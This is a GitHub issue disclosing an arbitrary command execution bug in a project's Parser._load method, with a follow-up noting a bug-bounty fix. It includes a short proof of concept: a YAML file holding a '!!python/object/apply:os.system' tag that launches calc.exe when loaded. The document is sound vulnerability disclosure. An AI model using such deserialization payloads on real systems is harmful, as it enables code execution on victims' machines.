Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

parser._load method is vulnerable #14

Open
bigbigliang-malwarebenchmark opened this issue Dec 17, 2018 · 1 comment
Open

parser._load method is vulnerable #14

bigbigliang-malwarebenchmark opened this issue Dec 17, 2018 · 1 comment

Comments

@bigbigliang-malwarebenchmark

#coding=utf-8
from definitions import Parser
a = Parser._load('C:\Users\Administrator\Desktop\simple.yaml')
#'C:\Users\Administrator\Desktop\simple.yaml':!!python/object/apply:os.system ["calc.exe"]

Hi, there is a vulnerability in load() method in parser.py, please see PoC above. It can execute arbitrary python commands resulting in command execution.

@huntr-helper
Copy link

‎‍🛠️ A fix has been provided for this issue. Please reference: 418sec#1

🔥 This fix has been provided through the https://huntr.dev/ bug bounty platform.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants